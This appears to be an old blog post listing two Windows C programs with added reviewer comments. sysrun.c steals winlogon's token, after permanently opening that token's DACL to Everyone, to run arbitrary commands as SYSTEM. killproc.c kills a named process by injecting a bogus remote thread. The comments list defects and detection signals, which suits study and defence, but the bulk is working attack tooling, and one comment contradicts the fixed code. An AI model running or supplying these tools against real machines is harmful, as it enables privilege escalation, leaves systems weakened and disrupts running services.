
"SYSTEM"用户创建进程

2008-06-05 11:51 435 查看
sysrun.c

cl sysrun.cpp Shlwapi.lib advapi32.lib

#include <stdio.h>
#include <windows.h>
#include <tlhelp32.h>
#include <shlwapi.h>
#include <aclapi.h>

#pragma comment(lib,"Shlwapi.lib")

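/*
 * Enable one named privilege (for example "SeDebugPrivilege") in the
 * current process token.
 *
 * szPrivilege: privilege name accepted by LookupPrivilegeValue.
 * Returns TRUE only when the privilege is actually enabled, FALSE otherwise.
 *
 * Defects fixed relative to the original:
 *  - AdjustTokenPrivileges returns TRUE even when the caller does not hold
 *    the privilege; it only sets GetLastError() to ERROR_NOT_ALL_ASSIGNED.
 *    The original reported success in that case, so callers went on to use
 *    a privilege they never had.
 *  - The token handle was closed on the failure paths but leaked on success.
 *
 * Enabling SeDebugPrivilege only works for accounts that hold it
 * (administrators by default). It is the gate for everything else in this
 * file, so which accounts hold it is the first thing to audit.
 */
BOOL EnableDebugPriv(LPCTSTR szPrivilege)
{
HANDLE hToken = NULL;
TOKEN_PRIVILEGES tkp;
BOOL bEnabled = FALSE;

if (!OpenProcessToken(GetCurrentProcess(),
TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,
&hToken))
{
return FALSE;
}

ZeroMemory(&tkp, sizeof tkp);
tkp.PrivilegeCount = 1;
tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

/* Look the LUID up straight into the privilege array; then adjust.  A
 * non-zero return from AdjustTokenPrivileges is not enough -- the
 * "privilege not held" case is signalled through GetLastError(). */
if (LookupPrivilegeValue(NULL, szPrivilege, &tkp.Privileges[0].Luid)
&& AdjustTokenPrivileges(hToken, FALSE, &tkp, sizeof tkp, NULL, NULL)
&& GetLastError() != ERROR_NOT_ALL_ASSIGNED)
{
bEnabled = TRUE;
}

/* Single exit so the token handle is closed on every path. */
CloseHandle(hToken);
return bEnabled;
}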

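/*
 * Return the PID of the first running process whose image name begins
 * with szProcName (case-insensitive prefix compare, exactly as the
 * original did), or 0 when nothing matches, the argument is NULL, or the
 * snapshot cannot be taken.
 *
 * Defects fixed relative to the original:
 *  - CreateToolhelp32Snapshot reports failure as INVALID_HANDLE_VALUE,
 *    which is non-zero, so `if (hSP)` never detected it and the invalid
 *    handle was passed to Process32First and CloseHandle.
 *  - dwPid was uninitialised (only guarded by bFound) and the DWORD result
 *    was spelled with the pointer constant NULL.
 *
 * Caveats kept from the original: the prefix compare also matches longer
 * names (e.g. "winlogon.exe.bak"); strlen() on an LPCTSTR assumes a
 * non-Unicode build. Newer Windows SDKs declare a kernel32 function with
 * this same name (GetProcessId(HANDLE)); compiling against one would
 * presumably conflict -- verify with the target SDK.
 */
DWORD GetProcessId(LPCTSTR szProcName)
{
PROCESSENTRY32 pe;
DWORD dwPid = 0;
size_t nameLen;
HANDLE hSP;

if (szProcName == NULL)
{
return 0;
}
/* Hoisted out of the loop; the original recomputed it per entry. */
nameLen = strlen(szProcName);

hSP = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
if (hSP == INVALID_HANDLE_VALUE)
{
return 0;
}

ZeroMemory(&pe, sizeof pe);
pe.dwSize = sizeof pe;

/* Walk the snapshot; stop at the first image name with the wanted prefix. */
for (BOOL more = Process32First(hSP, &pe); more; more = Process32Next(hSP, &pe))
{
if (StrCmpNI(szProcName, pe.szExeFile, (int)nameLen) == 0)
{
dwPid = pe.th32ProcessID;
break;
}
}

CloseHandle(hSP);
return dwPid;
}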

/*
 * Launch szProcessName under the LocalSystem account by re-using the
 * primary token of winlogon.exe.
 *
 * What the visible code does, in order:
 *   1. enables SeDebugPrivilege in the caller -- so this only works for an
 *      account that already holds it (administrators by default): it is an
 *      admin-to-SYSTEM step, not an unprivileged one;
 *   2. opens winlogon's token for READ_CONTROL|WRITE_DAC and rewrites the
 *      token object's own DACL so that "Everyone" is granted
 *      TOKEN_ALL_ACCESS;
 *   3. reopens the token with TOKEN_ALL_ACCESS, duplicates it as a primary
 *      token, calls CreateProcessAsUser with it and blocks until the child
 *      exits.
 *
 * szProcessName: mutable command line passed straight to CreateProcessAsUser
 *                as lpCommandLine (the API may write to it, hence LPTSTR).
 * Returns TRUE when the child was created and has exited, FALSE on any
 * failure; each failure path prints an API name and error code to stdout.
 *
 * Points a reviewer should know before reading on:
 *  - The DACL change in step 2 is never reverted. For the remaining lifetime
 *    of winlogon's token every account on the machine can open it with full
 *    access, i.e. the function leaves the host weaker than it found it.
 *  - Detection: a non-system process enabling SeDebugPrivilege, opening
 *    winlogon.exe, opening its token with WRITE_DAC and then calling
 *    CreateProcessAsUser with a token it never logged on for is a
 *    distinctive sequence for token-manipulation rules (object-access and
 *    privilege-use auditing on the process and token objects).
 *  - Resource hygiene: hProcess, hToken, hNewToken and pi are uninitialised
 *    until assigned, yet Cleanup closes them unconditionally, so early
 *    failures call CloseHandle on garbage; the hToken from the first
 *    OpenProcessToken is overwritten (leaked) by the second; pNewDAcl from
 *    SetEntriesInAcl is never LocalFree'd; ImpersonateLoggedOnUser's result
 *    is ignored and never undone with RevertToSelf.
 *  - "%d" is used for DWORD error codes, and the "/n" in every message looks
 *    like an extraction artefact of "\n"; both left untouched here because
 *    the strings are program output.
 *  - bRet is assigned the C++ literals true/false (the listing is built as
 *    sysrun.cpp) but the declared type is the Win32 BOOL.
 */
BOOL
CreateSystemProcess(LPTSTR szProcessName)
{
HANDLE hProcess;
HANDLE hToken, hNewToken;
DWORD dwPid;

PACL pOldDAcl = NULL;
PACL pNewDAcl = NULL;
BOOL bDAcl;
BOOL bDefDAcl;
DWORD dwRet;

PACL pSacl = NULL;
PSID pSidOwner = NULL;
PSID pSidPrimary = NULL;
DWORD dwAclSize = 0;
DWORD dwSaclSize = 0;
DWORD dwSidOwnLen = 0;
DWORD dwSidPrimLen = 0;

DWORD dwSDLen;
EXPLICIT_ACCESS ea;
PSECURITY_DESCRIPTOR pOrigSd = NULL;
PSECURITY_DESCRIPTOR pNewSd = NULL;

STARTUPINFO si;
PROCESS_INFORMATION pi;

BOOL bRet = true;

/* Step 1: SeDebugPrivilege is what lets OpenProcess / OpenProcessToken
 * succeed on winlogon below. Note that EnableDebugPriv as written above
 * returns TRUE even when the privilege is not held. */
if (!EnableDebugPriv("SeDebugPrivilege"))
{
printf("EnableDebugPriv() failed!/n");
bRet = false;
goto Cleanup;
}


/* Step 2: locate winlogon.exe. GetProcessId (defined above) does a
 * case-insensitive prefix compare and returns NULL/0 when absent. */
if ((dwPid = GetProcessId("WINLOGON.EXE")) == NULL)
{
printf("GetProcessId() failed!/n");
bRet = false;
goto Cleanup;
}

/* PROCESS_QUERY_INFORMATION is all OpenProcessToken needs. */
hProcess = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, dwPid);
if (hProcess == NULL)
{
printf("OpenProcess() = %d/n", GetLastError() );

bRet = false;
goto Cleanup;
}

/* Open the token for its *security descriptor* only (READ_CONTROL|WRITE_DAC),
 * presumably because its default DACL does not grant the caller the rights
 * needed further down. This hToken is never closed: the second
 * OpenProcessToken below overwrites it. */
if (!OpenProcessToken( hProcess, READ_CONTROL|WRITE_DAC, &hToken ))
{
printf("OpenProcessToken() = %d/n", GetLastError());

bRet = false;
goto Cleanup;
}

/* The ACE that will be merged into the token's DACL:
 * Everyone -> TOKEN_ALL_ACCESS, for the token's whole lifetime. */
ZeroMemory(&ea, sizeof( EXPLICIT_ACCESS));
BuildExplicitAccessWithName(&ea,
"Everyone",
TOKEN_ALL_ACCESS,
GRANT_ACCESS,
0);

/* Two-call pattern: size query with a NULL buffer, then the real read.
 * Only the DACL is fetched, so owner/group/SACL in the copies below are empty. */
if (!GetKernelObjectSecurity(hToken,
DACL_SECURITY_INFORMATION,
pOrigSd,
0,
&dwSDLen))
{

if (GetLastError() == ERROR_INSUFFICIENT_BUFFER)
{
pOrigSd = (PSECURITY_DESCRIPTOR) HeapAlloc(GetProcessHeap(),
HEAP_ZERO_MEMORY,
dwSDLen);
if (pOrigSd == NULL)
{
printf("HeapAlloc failed: pSd /n");

bRet = false;
goto Cleanup;
}
if (!GetKernelObjectSecurity(hToken,
DACL_SECURITY_INFORMATION,
pOrigSd,
dwSDLen,
&dwSDLen))
{
printf("GetKernelObjectSecurity() = %d/n", GetLastError());
bRet = false;
goto Cleanup;
}
}
else
{
printf("GetKernelObjectSecurity() = %d/n", GetLastError());
bRet = false;
goto Cleanup;
}
}

/* After this call pOldDAcl points INSIDE pOrigSd (self-relative SD).
 * Cleanup passes pOldDAcl to HeapFree unconditionally, so a failure between
 * here and the HeapAlloc that replaces it below frees an interior pointer. */
if (!GetSecurityDescriptorDacl(pOrigSd, &bDAcl, &pOldDAcl, &bDefDAcl))
{
printf("GetSecurityDescriptorDacl() = %d/n", GetLastError());

bRet = false;
goto Cleanup;
}

/* pNewDAcl is allocated by SetEntriesInAcl and must be released with
 * LocalFree; it never is. On failure the error is dwRet, not GetLastError(). */
dwRet = SetEntriesInAcl(1, &ea, pOldDAcl, &pNewDAcl);
if (dwRet != ERROR_SUCCESS)
{
printf("SetEntriesInAcl() = %d/n", GetLastError());
pNewDAcl = NULL;

bRet = false;
goto Cleanup;
}

/* MakeAbsoluteSD size query: every output buffer is NULL/0 except pOldDAcl,
 * which is handed in as the absolute-DACL buffer with dwAclSize == 0; the
 * call is expected to fail with ERROR_INSUFFICIENT_BUFFER and fill the sizes. */
if (!MakeAbsoluteSD(pOrigSd,
pNewSd,
&dwSDLen,
pOldDAcl,
&dwAclSize,
pSacl,
&dwSaclSize,
pSidOwner,
&dwSidOwnLen,
pSidPrimary,
&dwSidPrimLen))
{

if (GetLastError() == ERROR_INSUFFICIENT_BUFFER)
{
/* Fresh buffers for the absolute copy. pOldDAcl is re-pointed here: the
 * interior pointer from GetSecurityDescriptorDacl is dropped, not freed,
 * which is correct because it was never a separate allocation. */
pOldDAcl = (PACL) HeapAlloc(GetProcessHeap(),
HEAP_ZERO_MEMORY,
dwAclSize);
pSacl = (PACL) HeapAlloc(GetProcessHeap(),
HEAP_ZERO_MEMORY,
dwSaclSize);
pSidOwner = (PSID) HeapAlloc(GetProcessHeap(),
HEAP_ZERO_MEMORY,
dwSidOwnLen);
pSidPrimary = (PSID) HeapAlloc(GetProcessHeap(),
HEAP_ZERO_MEMORY,
dwSidPrimLen);
pNewSd = (PSECURITY_DESCRIPTOR) HeapAlloc(GetProcessHeap(),
HEAP_ZERO_MEMORY,
dwSDLen);

if (pOldDAcl == NULL||
pSacl == NULL||
pSidOwner == NULL||
pSidPrimary == NULL||
pNewSd == NULL )
{
printf("HeapAlloc SID or ACL failed!/n");

bRet = false;
goto Cleanup;
}

if (!MakeAbsoluteSD(pOrigSd,
pNewSd,
&dwSDLen,
pOldDAcl,
&dwAclSize,
pSacl,
&dwSaclSize,
pSidOwner,
&dwSidOwnLen,
pSidPrimary,
&dwSidPrimLen))
{
printf("MakeAbsoluteSD() = %d/n", GetLastError());

bRet = false;
goto Cleanup;
}
}
else
{
printf("MakeAbsoluteSD() = %d/n", GetLastError());

bRet = false;
goto Cleanup;
}
}

/* Swap the copied DACL for the one that carries the Everyone ACE. The
 * absolute copy in pOldDAcl was only scratch space for MakeAbsoluteSD. */
if (!SetSecurityDescriptorDacl( pNewSd, bDAcl, pNewDAcl, bDefDAcl))
{
printf("SetSecurityDescriptorDacl() = %d/n", GetLastError());

bRet = false;
goto Cleanup;
}

/* Writes the weakened DACL back onto winlogon's token object.
 * Nothing in this function restores the original one. */
if (!SetKernelObjectSecurity( hToken, DACL_SECURITY_INFORMATION, pNewSd))
{
printf("SetKernelObjectSecurity() = %d/n", GetLastError());

bRet = false;
goto Cleanup;
}

/* Step 3: now that the DACL allows it, reopen with full access.
 * This overwrites (and so leaks) the hToken opened above. */
if (!OpenProcessToken( hProcess, TOKEN_ALL_ACCESS, &hToken))
{
printf("OpenProcessToken() = %d/n", GetLastError());

bRet = false;
goto Cleanup;
}

/* Primary-token copy, the form CreateProcessAsUser requires. */
if (!DuplicateTokenEx(hToken,
TOKEN_ALL_ACCESS,
NULL,
SecurityImpersonation,
TokenPrimary,
&hNewToken))
{
printf("DuplicateTokenEx() = %d/n", GetLastError());

bRet = false;
goto Cleanup;
}

ZeroMemory(&si, sizeof(STARTUPINFO));
si.cb = sizeof(STARTUPINFO);

/* Return value ignored and there is no RevertToSelf, so the calling
 * thread keeps impersonating until it exits. */
ImpersonateLoggedOnUser(hNewToken);

/* szProcessName goes in as the mutable lpCommandLine; no application name,
 * no flags, inherited environment and current directory. */
if (!CreateProcessAsUser(hNewToken,
NULL,
szProcessName,
NULL,
NULL,
FALSE,
NULL,//NORMAL_PRIORITY_CLASS|CREATE_NEW_CONSOLE,
NULL,
NULL,
&si,
&pi))
{
printf("CreateProcessAsUser() = %d/n", GetLastError());

bRet = false;
goto Cleanup;
}
/* Blocks until the child exits. */
WaitForSingleObject(pi.hProcess, INFINITE);

/* Cleanup: the heap pointers are NULL-guarded, but the CloseHandle calls
 * are not, and hProcess/hToken/hNewToken/pi are uninitialised on the early
 * exits, so garbage handle values reach CloseHandle on those paths. */
Cleanup:
if (pOrigSd)
{
HeapFree(GetProcessHeap(), 0, pOrigSd );
}
if (pNewSd)
{
HeapFree(GetProcessHeap(), 0, pNewSd );
}
if (pSidPrimary)
{
HeapFree(GetProcessHeap(), 0, pSidPrimary);
}
if (pSidOwner)
{
HeapFree(GetProcessHeap(), 0, pSidOwner);
}
if (pSacl)
{
HeapFree(GetProcessHeap(), 0, pSacl);
}
if (pOldDAcl)
{
HeapFree(GetProcessHeap(), 0, pOldDAcl);
}

CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);
CloseHandle(hToken);
CloseHandle(hNewToken);
CloseHandle(hProcess);
return bRet;
}

/*
 * Entry point: joins argv[1..argc-1] into one space-separated command line
 * and hands it to CreateSystemProcess.
 *
 * Two defects a reviewer must flag, both in argument handling:
 *  - cmdLine is a fixed array sized by its initializer (three bytes as
 *    written; two if the original literal was "\0"), yet strcpy/strcat copy
 *    arbitrarily long argv strings into it: a stack buffer overflow on any
 *    real input. A buffer sized from the argv lengths, with length checks
 *    on every append, is required.
 *  - printf(cmdLine) passes user-controlled text as the format string, so
 *    any '%' in an argument is interpreted as a conversion. Print it with
 *    printf("%s", cmdLine) or fputs instead.
 * Also: void main is non-standard (should be int main), and the trailing
 * strcat(cmdLine,"/0") appends the two characters "/0" (or nothing at all
 * if it was originally "\0"); either way it terminates nothing.
 */
void main(int argc, char** argv)
{
if (argc<2)
{
printf("Usage %s filename.exe/n", argv[0]);
return;
}
/* Sized by its initializer only -- far too small for the copies below. */
char cmdLine[] = "/0";

strcpy(cmdLine,argv[1]);
strcat(cmdLine," ");
/* Appends argv[2] .. argv[argc-1], each followed by a space. */
for(int i=1;i<(argc-1);i++)
{
strcat(cmdLine,argv[i+1]);
strcat(cmdLine," ");
}
strcat(cmdLine,"/0");
/* User input used as the format string. */
printf(cmdLine);
if (CreateSystemProcess(cmdLine) == FALSE)
{
printf("CreateSystemProcess() failed!/n");
}
return;
}






killproc.c

cl killproc.c Shlwapi.lib advapi32.lib

#include <stdio.h>
#include <windows.h>
#include <tlhelp32.h>
#include <shlwapi.h>
#include <aclapi.h>

#pragma comment(lib,"Shlwapi.lib")

/*
BOOL EnableDebugPriv( LPCTSTR szPrivilege )
{
HANDLE hToken;
LUID sedebugnameValue;
TOKEN_PRIVILEGES tkp;

if ( !OpenProcessToken( GetCurrentProcess(),
TOKEN_ADJUST_PRIVILEGES|TOKEN_QUERY,
&hToken ) )
{
return FALSE;
}
if ( !LookupPrivilegeValue( NULL, szPrivilege, &sedebugnameValue ) )
{
CloseHandle( hToken );
return FALSE;
}

tkp.PrivilegeCount = 1;
tkp.Privileges[0].Luid = sedebugnameValue;
tkp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

if ( !AdjustTokenPrivileges( hToken, FALSE, &tkp, sizeof tkp, NULL, NULL ) )
{
CloseHandle( hToken );
return FALSE;
}

return TRUE;
}
*/
/*
 * Locate a process by image name and start a thread in it whose start
 * address is the integer 100. That is not a mapped code address, so the new
 * thread presumably faults at once and the unhandled exception tears the
 * target down -- which is what the file name "killproc" describes. Despite
 * the "exploit" wording in the messages this is a process killer, not the
 * use of a vulnerability.
 *
 * chProcessName: image name matched exactly, case-insensitively, extension
 *                included (lstrcmpi against PROCESSENTRY32.szExeFile).
 * Returns the matched PID (non-zero, narrowed to BOOL) on success; FALSE
 * when the snapshot fails, the name is not found, or OpenProcess is denied.
 *
 * Reviewer notes:
 *  - Process32Next is called without a preceding Process32First, so the
 *    first snapshot entry is never compared.
 *  - PROCESS_ALL_ACCESS is far more than CreateRemoteThread needs, and the
 *    printed "Write access" wording does not match the right requested.
 *  - OpenProcess is the only control: it fails for processes owned by other
 *    accounts unless the caller holds SeDebugPrivilege (the EnableDebugPriv
 *    call is commented out in main). Cross-process thread creation with a
 *    start address outside any loaded module is a well-known telemetry
 *    signal for remote-thread monitoring.
 *  - uExitCode and lpExitCode are unused; the remote thread handle returned
 *    by CreateRemoteThread is dropped unchecked.
 */
BOOL exploit(char* chProcessName)
{

HANDLE hProcessSnap = NULL;

HANDLE hProcess = NULL;

BOOL bFound = FALSE;

BOOL bRet = FALSE;

PROCESSENTRY32 pe32 = {0};

UINT uExitCode = 0;

DWORD dwExitCode = 0;

LPDWORD lpExitCode = &dwExitCode;

hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);

/* Correct failure test for this API (INVALID_HANDLE_VALUE, not NULL). */
if (hProcessSnap == INVALID_HANDLE_VALUE)
return (FALSE);

pe32.dwSize = sizeof(PROCESSENTRY32);

printf("Searching for process... /n");

/* Skips the first entry: no Process32First before Process32Next. */
while(!bFound && Process32Next(hProcessSnap, &pe32))
{
if(lstrcmpi(pe32.szExeFile, chProcessName) == 0)
bFound = TRUE;

}

CloseHandle(hProcessSnap);

if(!bFound){

printf("Process not found. /n");

return(FALSE);

}
printf("Process found. /n");

/* Full access requested; pe32 still holds the matched entry's PID. */
hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pe32.th32ProcessID);

if(hProcess == NULL){

printf("Write access denied for this process. /n");
printf("Exploit failed. /n");

return(FALSE);
}

printf("Write access is allowed /n");

printf("Send exploit to process.../n");

/* Start address 100 cast to a thread routine; the thread handle is
 * discarded and hProcess is never closed. */
CreateRemoteThread(hProcess,0,0,(DWORD (__stdcall *)(void *))100,0,0,0);

printf("Success. /n");

/* A DWORD PID returned through a BOOL; non-zero, so "true" to callers. */
return(pe32.th32ProcessID);
}

/*
 * Entry point: argv[1] is the image name handed to exploit().
 *
 * argv[1] is read before argc is checked. When argc == 1 that is argv[argc],
 * which the C standard guarantees to be a null pointer, so the read itself is
 * well-defined and the value is unused on that path. The EnableDebugPriv call
 * is commented out, so the tool runs with whatever rights the caller already
 * has. main falls off the end without a return statement; in C99 and later
 * that is an implicit return 0, so the exit status never reflects failure.
 */
int main(int argc,char **argv)
{
char* chProcess = argv[1];

if(argc < 2) {

printf("/n");
printf("Usage: killproc.exe <process name> /n");

}
else
{
//if ( !EnableDebugPriv("SeDebugPrivilege") )
// printf("EnableDebugPriv() failed!/n");

/* Result ignored; a FALSE return is not reported here. */
exploit(chProcess);
}

}